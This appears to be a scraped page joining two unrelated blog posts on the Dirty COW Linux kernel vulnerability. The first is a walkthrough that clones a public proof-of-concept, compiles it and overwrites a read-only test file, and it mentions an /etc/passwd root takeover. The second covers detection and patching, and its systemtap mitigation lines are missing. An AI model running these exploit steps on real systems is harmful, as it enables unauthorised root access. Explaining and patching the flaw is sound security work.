Error dirty cow exploit failed no ta backup done

The «Dirty COW» Linux Exploit

30 Dec 2016

«Dirty COW» (CVE-2016-5195) is a remarkable software vulnerability in the Linux operating system that was discovered in the October of 2016. Shockingly, the vulnerability is exploitable
on unpatched Linux systems of nearly every Linux-based operating system including Android and dates back an alarming 9 years.

The exploit takes advantage of a race condition in the Linux copy-on-write process that allows arbitrary data to be written to any file part of the operating system including read-only
files.

Naturally, attackers can utilize this capability to gain root access to a device by writing to key system files; numerous methods of success in achieving this goal can be found dispersed
through the web. A good resource of examples is located at the
Github Dirty Cow PoC Repository.

One PoC, for example, edits the /etc/passwd file to force change the root password to a nominated string. The user may then log into the shell using the newly set password.

The remainder of this post will provide steps for running a basic implementation of the exploit which writes to a newly created read-only file.

Firstly, we can check if our system is vulnerable by running a vulnerability test script released by Red Hat. (Compatible with RHEL/CentOS)

[user]~$ wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_1.sh

[user]~$ bash rh-cve-2016-5195_1.sh

Your kernel is 2.6.32-642.6.1.el6.x86_64 which IS vulnerable.

If our server is indeed vulnerable we may proceed to begin by cloning the dirtycow PoC repository.

[user]~$ git clone https://github.com/dirtycow/dirtycow.github.io.git

Cloning into 'dirtycow.github.io'...

remote: Counting objects: 231, done.

remote: Total 231 (delta 0), reused 0 (delta 0), pack-reused 231

Receiving objects: 100% (231/231), 138.47 KiB | 0 bytes/s, done.

Resolving deltas: 100% (131/131), done.

Next, modify your working directory and compile the source file. If you are running CentOS/RHEL 5 or 6 you will need to follow the same steps but instead compile the «pokemon.c» file due to
the disability of «mem_write» in these Linux distributions.

[user]~$ cd dirtycow.github.io/

[user]~$ gcc -pthread dirtyc0w.c -o dirtyc0w

We will now create a new file with the string «1234567» and modify its file permissions to read-only for all users.

[user]~$ echo "1234567" | sudo tee test_file

[user]~$ sudo chmod 444 test_file

Finally, we will run the exploit and attempt to modify the contents of our test file to the string «Success»; verify the modification with the «cat» command.

[user]~$ ./dirtyc0w test_file Success

[user]~$ cat test_file

Success

If «Success» is indeed observed take a moment to think about the intricate and enigmatic world of computer security. This bug slipped through kernel updates for nearly 10 years. A bug that
can literally offer root access to any user in a matter of seconds. What other vulnerabilities are out there in the wild waiting to be discovered? Who will discover them first? A cyber
security engineer working for Kaspersky Lab? Or perhaps someone much darker? Take care and thanks for reading.

Always,

Ruby Devices

Sign Up Below for Notifications on new Blog Posts

More from the Blog:

• How to Hack KeePass Passwords using Hashcat»
• How to Cheat the Game Show «Who Wants to be a Millionaire»
• The «Dirty COW» Linux Exploit
• Creating Malware Using the Stuxnet LNK Exploit

The Worlds Smartest Calculator

Ruby Devices do not in any way condone the practice of illegal activities in relation to hacking.
All teachings with regards to malware and other exploits are discussed for educational purposes only and are not written with the
intention of malicious application.

Dirty COW vulnerability was first discovered a decade ago and has been present in Linux kernel versions from 2.6.22, which was released in 2007.

But the vulnerability gained attention only recently when hackers started exploiting it. This has led to the release of this bug as CVE-2016-5195 on October 19th, 2016.

What is Dirty Cow vulnerability (CVE-2016-5195)?

CVE-2016-5195 aka “Dirty COW vulnerability” involves a privilege escalation exploit which affects the way memory operations are handled.

Since the feature that is affected by this bug is the copy-on-write (COW) mechanism in Linux kernel for managing ‘dirty’ memory pages, this vulnerability is termed ‘Dirty COW’.

Misusing this flaw in kernel, an unprivileged local user can escalate his privileges in the system and thus gain write access on read-only memory updates.

Using this privilege escalation, local users can write to any file that they can read. Any malicious application or user can thus tamper with critical read-only root-owned files.

Is Dirty Cow vulnerability (CVE-2016-5195) critical?

Dirty COW vulnerability affects the Linux kernel. Most open-source operating systems such as RedHat, Ubuntu, Fedora, Debian, etc. are based over Linux kernel.

As a result, this vulnerability is a ‘High’ priority one as it can affect a huge percentage of servers running over Linux and Android kernels.

CVE-2016-5195 exploit can be misused by malicious users who are provided with shell access in Linux servers. They can gain root access and attack other users.

When combined with other attacks such as SQL injection, this privilege escalation attack can even mess up the entire data in these servers, which makes it a critical one.

Are you servers affected by Dirty Cow exploit?

If your server or VM or container is hosted with any of these OS versions, then they are vulnerable:

1. Red Hat Enterprise Linux 7.x, 6.x and 5.x

2. CentOS Linux 7.x, 6.x and 5.x

3. Debian Linux wheezy, jessie, stretch and sid

4. Ubuntu Linux precise (LTS 12.04), trusty, xenial (LTS 16.04), yakkety and vivid/ubuntu-core

5. SUSE Linux Enterprise 11 and 12

First step to do is to check your OS flavor and to know your Linux kernel version, using the ‘uname’ command:

Here, the OS is Ubuntu and kernel version is 3.13.0-24-generic.

If the kernel version displayed in your server is earlier than these patched versions, your server is vulnerable:

• 4.8.0-26.28 for Ubuntu 16.10
• 4.4.0-45.66 for Ubuntu 16.04 LTS
• 3.13.0-100.147 for Ubuntu 14.04 LTS
• 3.2.0-113.155 for Ubuntu 12.04 LTS
• 3.16.36-1+deb8u2 for Debian 8
• 3.2.82-1 for Debian 7
• 4.7.8-1 for Debian unstable

How to protect your servers from Dirty Cow bug

Dirty COW privilege escalation vulnerability in the Linux kernel has been acknowledged and patch has been already released for the kernel.

Some major OS vendors have released the security patches for their OS versions. So, the immediate fix is to update the software in your servers.

If your server is configured for automatic software updates, the server would have already got the new patch installed.

But for the installed updates to come into effect, you will have to reboot the server.

Most live servers disable automatic updates due to the fear of mess-ups. In such cases, you have to manually update the OS to the secure version.

CLICK HERE TO PROTECT YOUR SERVERS NOW!

Here, we’ll discuss how to update the different OS flavors in your servers.

1. How to mitigate Dirty Cow vulnerability in CentOS and RedHat servers

RedHat has released the updated OS versions with the security patch for Dirty Cow vulnerability. To update the OS with this security patch, use ‘yum update’.

Once the update is complete, you may have to reboot the server for the patched OS to load. For servers in which OS update cannot be done, there is a temporary mitigation:

1) Create a file “update.stp” and add these lines:

2) Install the “systemtap” package and its required dependencies.

3) Execute the command “stap -g update.stp” as root. As system reboot can tamper with this patch, these steps would have to be repeated in case of reboots.

2. How to fix Dirty Cow vulnerability in Ubuntu and Debian servers

Update the OS with the latest security patch available from the OS repository. This can be done using these commands:

sudo apt-get update && sudo apt-get dist-upgrade

Once the update is complete, reboot the server for the updates to come into effect.

3. How to fix Dirty Cow vulnerability in OpenSUSE servers

OpenSUSE has released the vulnerability patches for their OS versions. To apply the patch, run the command:

zypper patch

Once the update is complete, reboot the server for the updates to come into effect.

4. How to fix Dirty Cow vulnerability in CloudLinux servers

To update the security patch for CloudLinux 7, the steps are:

yum clean all; yum install kernel-3.10.0-427.10.1.lve1.4.22.el7 kmod-lve-1.4-22.el7 --enablerepo=cloudlinux-updates-testing

For CloudLinux 6, follow these steps:

yum clean all; yum install kernel-2.6.32-673.26.1.lve1.4.18.el6 kmod-lve-1.4-18.el6 --enablerepo=cloudlinux-updates-testing

Once the kernel updates are installed, reboot the server for the new kernel to come into effect.

SECURE YOUR SERVERS FROM ALL ATTACKS!

In short..

Today we saw the implications of running a server with the Dirty COW vulnerability and how to secure your servers.

‘Dirty COW’ is a zero-day vulnerability and its hard to detect the attack. So securing your servers immediately with the patch is crucial to avoid a hack.

But updating the software packages and applying the patches or mitigation steps should be done by experts and with utmost caution.

At Bobcares, our 24/7 security expert team keeps track of the vulnerabilities and apply patches to our customers’ servers within no time.

If you’d like to know how to secure your servers with the best security practices and to ensure 24/7 pro-active administration, feel free to contact us.

var google_conversion_label = «owonCMyG5nEQ0aD71QM»;

Bobcares provides Outsourced Hosting Support and Outsourced Server Management for online businesses. Our services include Hosting Support Services, server support, help desk support, live chat support and phone support.